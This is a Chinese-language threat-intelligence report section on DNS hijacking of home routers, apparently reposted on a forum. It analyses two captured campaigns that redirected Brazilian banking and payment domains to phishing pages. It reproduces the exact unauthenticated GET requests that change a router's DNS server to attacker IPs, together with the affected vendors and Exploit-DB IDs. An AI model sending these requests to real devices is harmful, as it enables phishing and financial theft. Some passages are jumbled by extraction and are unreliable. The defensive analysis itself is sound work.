路由器
DNS 劫持攻击情况4.4.2.1 简介
DNS,即 Domain Name System(域名系统),是一种将域名解析为计算机能够识别的网络地址
(IP 地址)的系统,是 Internet 的重要组成部分。DNS 劫持指 DNS 服务器的拥有者(或攻击者)恶意将某 域名指向错误的 IP 地址。攻击者进行 DNS劫持的流程为:首先对暴露在互联网
上的存在未授权 DNS修改漏洞的路由器进行 攻击,将其 DNS服务器地址改为攻击者的恶意 DNS服务器;之后,当用户访问攻击者劫持的域名时, 会访问到钓鱼网站,页面中会诱导用户输入账号密码、银行卡号等敏感信息;最后,攻击者利用收集到 的敏感信息获利。DNS劫持危害主要有以下五点:
(1)无法访问某些域名,表现为连接超时等。
(2)访问某些域名时跳转到其他网站。
(3)当访问到错误的域名时,跳转到广告页面。
(4)访问某些域名时,页面增加了广告信息。主要针对静态网页。
(5)劫持到模仿真实网站做成的假网站,从而窃取用户名、密码甚至银行卡卡号、密码等恶意行为。
前四点会为用户带来糟糕的体验,以及为 DNS 拥有者带来一笔不菲的收入。而最后一点直接威胁 到用户的数据乃至财产安全,是非常严重的。
4.4.2.2 攻击趋势分析
我们对绿盟威胁捕获系统中的 DNS劫持相关攻击事件进行了分析,如图 4.13 所示,2020 年 1月至今, 我们共捕获到 2 起 DNS 劫持行为。第一起攻击主要集中在 5 月 24 日,攻击源只有 1 个,第二起攻击 在 8 月 18 日首次被我们捕获到,之后一直处于活状态。由于第一起攻击事件持续时间短并且攻击源 唯一,因此,下文除攻击手法分析外,均针对第二起事件进行分析。
4.4.2.3 攻击手法分析
第一起 DNS劫持事件:
在第一起劫持事件中,攻击源只有一个,在短时间内进行了全球范围的攻击,目标端口是 80 和 8080,共使用了 4 类远程 DNS修改(Remote DNS Change)漏洞。下面具体介绍下这 4 类远程攻击:
🅙 漏洞 1 攻击情况介绍 [^1]
攻击手法:
GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
目标端口:80、8080
目标设备:我们在 Exploit-DB中共发现 18 条相关的记录 [^2],涉及多个厂商的路由器,包括 D-Link、 UTstarcom、Beetel、iBall Baton、Tenda、Pirelli、Exper、ASUS、COMTREND、PLANET、inteno、 TP-LINK、Shuttle Tech 等。
🅙 漏洞 2 攻击介绍
攻击手法:
GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8
目标端口:80、8080
目标设备:D-Link DSL-2640R(EDB-ID: 43678)、DSL-2740R(EDB-ID: 35917)。
🅙 漏洞 3 攻击介绍
攻击手法:
GET
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8& dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
目标端口:80、8080
目标设备:D-Link DSL-2640B(EDB-ID: 36105)。 🅙 漏洞 4 攻击介绍
攻击手法:
GET
/go[for](http://github5.com/search?f=p&wd=for)m/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=111.90.159.53& DS2=8.8.8.8 HTTP/1.1
目标端口:8080
目标设备:我们在 Exploit-DB中共发现 7 条相关的记录,涉及多个厂商的路由器,包括 Secutech、 Tenda、Unicon 等。
第二起 DNS劫持事件
在第二起劫持事件中,攻击源有 57 个,8 月 18 日起持续进行全球范围的攻击,目标端口是 80、81、82、8080 和 8182,攻击方式唯一,采用了上一节提到的漏洞 1。
攻击手法:
GET /dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1
从上述攻击手法中我们也可以看到,攻击者在 dnsSecondary 和 8.8.4.4 之间忘记写“=”了,这将 导致目标设备的 dnsSecondary 并不会被攻击者所改变。
4.4.2.4 攻击源分析
在第二起攻击事件中,我们共捕获到 57 个攻击源的 68.4% 的攻击源位于荷兰,其余攻击源位于美国。我们发现这些 属 ISP 为 DIGITALOCEAN-ASN。绿盟威胁情报中心的数据显示, 个合理的推测是,这些 IP 所属主机存在漏洞,被攻击者攻破后进行
DNS 篡改行为,这些攻击源分布很集中, IP 均来自同一 ASN(AS14061),所
80.1% 的 IP 均有 IDC标签。因此,一 DNS劫持攻击。
图 4.14 是攻击源主要开放的端口的分布情况,这些攻击源中,大部分开放了 22、443 和 80 端口。
图 4.14 攻击源主要开放端口分布情况
4.4.2.5 DNS 劫持目标分析
在第二起攻击事件中,攻击者的攻击目标主要为巴西电子邮箱类(如 terra.com.br)、银行类(如50)
bradesco.com.br、caixa.gov.br、santander.com.br),还有和财产相关的通用娱乐电商支付平台类(如 netflix.com、Americanas.com.br、paypal.com)。采集的个人信息包括电子邮箱账户、支票账户、网 络银行账号、银行卡号和相关银行卡信息及其密码等。另外,还有 CPF 码(巴西纳税人标识)以及持 卡人姓名等。可见攻击者目标明确,对财产方面感兴趣。另外我们注意到 [23],有攻击者在 2019 年 3 月, 也对类似的域名进行过劫持。
所有的假页面有一些共同点:
一是 HTML结构简单,几乎无 CSS,而用整页图片替代,如图 4.15 所示,攻击者的伪造页面其实 是一张图片;
二是采用 PHP 生成网页,还有少量 JavaScript 文件用于检测输入信息的合法性; 三是仅有登陆功能可用,其余大部分超链接无法使用或者链接到 404 页面; 四是均为 HTTP 协议,无法通过 HTTPS 访问;
五是大部分网页为葡萄牙语(巴西官方语言),被攻击的域名也以巴西域名(br 后缀)为主,且发 现了用葡萄牙语编写的代码,猜测攻击者为巴西人可能性较大。
图 4.15 CAIXA银行的真实页面(左)和攻击者伪造页面(右)
4.4.2.6 潜在受影响设备暴露情况分析
通过 Exploit-DB,我们可以获取存在远程 DNS修改漏洞的设备厂商和型号,因此,本节将从这两个 角度对潜在受影响的设备进行评估,数据来自绿盟威胁情报中心。由于劫持目标与巴西有关,除分析全 球受影响情况外,我们也对巴西的受影响设备的分布情况进行了分析。
图 4 16 是潜在受影响的设备型号的分布情况,在我们可识别的设备中,真正暴露在巴西的主要是 Beetel 公司的 BCM96338 型号的路由器,但其暴露数量也仅为 361 台,因而受影响的用户较少。
图 4.16 潜在受影响设备暴露情况(设备厂商 -型号)
图 4.17 是潜在受影响的设备厂商的分布情况,之所以从这个角度来考虑,是因为 Exploit-DB的数 据仅为互联网上披露出来的数据,但一个厂商设备型号众多,未必会被全面进行测试,未被披露的型号 同样可能存在相同的漏洞。从图 4.17 可以看出,TP-LINK、ASUS和 D-Link路由器的全球暴露数量均超 过百万,而在巴西,这三个厂商的设备也有一定的暴露面。但是这些设备有多少的 DNS 可被篡改,我 们尚未验证。
图 4.17 潜在受影响设备暴露情况(设备厂商)
4261
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
